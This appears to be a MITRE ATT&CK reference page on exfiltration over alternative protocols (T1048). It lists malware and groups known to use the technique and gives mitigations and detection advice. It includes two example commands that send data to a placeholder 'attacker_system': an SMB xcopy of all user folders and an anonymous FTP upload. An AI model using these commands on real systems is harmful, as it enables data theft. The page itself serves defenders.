Exfiltration Over Alternative Protocol

Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.

Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol.

SMB command-line example:

  • net use \\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\* \\attacker_system\share_folder\

Anonymous FTP command-line example:[1]

  • echo PUT C:\Path\to\file.txt | ftp -A attacker_system
ID: T1048
Tactic: Exfiltration
Platform: Linux, macOS, Windows
Data Sources: User interface, Process monitoring, Process use of network, Packet capture, Netflow/Enclave netflow, Network protocol analysis
Requires Network:  Yes
Contributors: Alfredo Abarca
Version: 1.1

Procedure Examples

Name Description
Agent Tesla

Agent Tesla has routines for exfiltration over SMTP, FTP, and HTTP.[10]

APT33

APT33 has used FTP to exfiltrate files (separately from the C2 channel).[17]

BITSAdmin

BITSAdmin can be used to create BITS Jobs to upload files from a compromised host.[3]

Carbon

Carbon uses HTTP to send data to the C2 server.[12]

Cherry Picker

Cherry Picker exfiltrates files over FTP.[6]

CosmicDuke

CosmicDuke exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.[8]

Empire

Empire can use Dropbox and GitHub for data exfiltration.[5]

FIN8

FIN8 has used FTP to exfiltrate collected data.[13]

FTP

FTP may be used to exfiltrate data separate from the main command and control protocol.[4]

HAMMERTOSS

HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.[9]

Hydraq

Hydraq connects to a predefined domain on port 443 to exfil gathered information.[11]

Lazarus Group

Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.[15][16]

OilRig

OilRig has exfiltrated data over FTP separately from its primary C2 channel over DNS.[1]

Remsec

Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.[7]

Thrip

Thrip has used WinSCP to exfiltrate data from a targeted organization over FTP.[14]

Turla

Turla has used WebDAV to upload stolen USB files to a cloud drive.[18]

Mitigations

Mitigation Description
Filter Network Traffic

Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network.

Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.

Network Segmentation

Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network.[2]

Detection

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. [19]

References